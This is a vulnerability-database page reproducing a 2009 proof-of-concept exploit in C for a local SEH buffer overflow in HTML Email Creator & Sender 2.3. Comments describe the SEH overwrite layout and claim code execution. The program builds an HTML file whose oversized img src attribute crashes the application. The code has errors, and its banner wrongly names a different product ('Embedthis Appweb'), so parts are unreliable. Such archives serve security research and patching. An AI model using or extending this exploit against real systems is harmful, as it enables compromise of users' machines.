Vulners
Lucene search
HTML Email Creator & Sender 2.3 - Local Buffer Overflow PoC (SEH)
/*0day HTML Email Creator & Sender v2.3 Local Buffer Overflow(Seh) Poc
********************************************************************
Debugging info
Seh handler is overwriten , the offset is at 60 bytes in our buffer
so you have to build your buffer as follows:
[PONTER TO NEXT SEH]-------[SEH HANDLER]----[NOP]------[SHELLCODE]
| | | |
JMP 4 bytes POP POP RET 50*0x90 calc.exe
*********************************************************************
Code execution is possible.
CPU Registers
EAX 00000000
ECX 00000208
EDX 00000000
EBX 00000029
ESP 0012E224
EBP 7C8101B1 kernel32.lstrcpynA
ESI 90909090 <------------------CONTROLED
EDI 00001209
EIP 0042E1C7 HtmlEmai.0042E1C7
*/
#include <stdio.h>
#include <windows.h>
#include <string.h>
#include <getopt.h>
#include <stdint.h>
typedef struct Start {
uint8_t sh;
uint8_t st;
uint8_t sm;
uint8_t sl;
}HTML;
typedef struct Middle {
uint8_t sh;
uint8_t se;
uint8_t sa;
uint8_t sd;
}HEAD;
typedef struct End {
uint8_t sb;
uint8_t so;
uint8_t sD;
uint8_t sy;
}BODY;
#define BUFFERSIZE 0x1A0A
#define FILESIZE 29A
#define SRC "<img src="
void Fbuild(char *fname)
{ HTML *ht_ml;
HEAD *he_ad;
BODY *bo_dy;
char *memBuffer;
//"\x48\x54\x4D\x4C" -html
ht_ml = (HTML*)malloc(sizeof(HTML));
he_ad = (HEAD*)malloc(sizeof(HEAD));
bo_dy = (BODY*)malloc(sizeof(BODY));
memBuffer = (char*)malloc(BUFFERSIZE);
if(ht_ml == NULL || he_ad == NULL || bo_dy == NULL || memBuffer == NULL) {
exit(-1);
}
ht_ml->sh = 0x48;
ht_ml->st = 0x54;
ht_ml->sm = 0x4D;
ht_ml->sl = 0x4C;
//second structure
//HEAD "\x48\x45\x41\x44"
he_ad->sh = 0x48;
he_ad->se = 0x45;
he_ad->sa = 0x41;
he_ad->sd = 0x44;
//thierd structure
//"\x42\x4F\x44\x59"
bo_dy->sb = 0x42;
bo_dy->so = 0x4F;
bo_dy->sD = 0x44;
bo_dy->sy = 0x59;
FILE *f;
f = fopen(fname, "w");
if( f == NULL) {
exit(-1);
}
int32_t offset = 0;
memcpy(memBuffer, "<", 1);
offset += 1;
memcpy(memBuffer+offset, ht_ml, sizeof(ht_ml));
offset += sizeof(ht_ml);
memcpy(memBuffer+offset, ">", 1);
offset += 1;
memcpy(memBuffer+offset, "<", 1);
offset += 1;
memcpy(memBuffer+offset, he_ad, sizeof(he_ad));
offset += sizeof(he_ad);
memcpy(memBuffer+offset, ">", 1);
offset += 1;
memcpy(memBuffer+offset, "<", 1);
offset += 1;
memcpy(memBuffer+offset, "\\", 1);
offset += 1;
memcpy(memBuffer+offset, he_ad, sizeof(he_ad));
offset += sizeof(he_ad);
memcpy(memBuffer+offset, ">", 1);
offset += 1;
memcpy(memBuffer+offset, "<", 1);
offset += 1;
memcpy(memBuffer+offset, bo_dy, sizeof(bo_dy));
offset += sizeof(bo_dy);
memcpy(memBuffer+offset, ">", 1);
offset += 1;
uint8_t shit[] ={ 0x3C,0x69,0x6D,0x67,0x20,0x73,0x72,0x63,0x3D };
memcpy(memBuffer+offset, shit, sizeof(shit));
offset += sizeof(shit);
memset(memBuffer+offset, 0x22, 1);
offset += 1;
memset(memBuffer+offset, 0x41, 4616);
offset += 4616;
memset(memBuffer+offset, 0x22, 1);
offset += 1;
memcpy(memBuffer+offset, ">", 1);
offset += 1;
memcpy(memBuffer+offset, "<", 1);
offset += 1;
memcpy(memBuffer+offset, "\\", 1);
offset += 1;
memcpy(memBuffer+offset, bo_dy, sizeof(bo_dy));
offset += sizeof(bo_dy);
memcpy(memBuffer+offset, ">", 1);
offset += 1;
memcpy(memBuffer+offset, "<", 1);
offset += 1;
memcpy(memBuffer+offset, "\\", 1);
offset += 1;
memcpy(memBuffer+offset, ht_ml, sizeof(ht_ml));
offset += sizeof(ht_ml);
memcpy(memBuffer+offset, ">", 1);
offset += 2;
fwrite(memBuffer, offset , 1, f);
fwrite("\x00", 1, 1, f);
printf("File Done!\n");
}
int main(int argc, char *argv[])
{ char *fname = argv[1];
system("CLS");
fprintf(stdout , ":: ::\n");
fprintf(stdout , "Embedthis Appweb Remote Stack Overflow POC\n");
fprintf(stdout , "All Credits:fl0 fl0w\n");
fprintf(stdout , ":: ::\n");
if(argc < 2) {
printf("Usage is %s filename.html\n", argv[0]);
exit(-1);
}
Fbuild(fname);
return 0;
}
// milw0rm.com [2009-08-18]
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1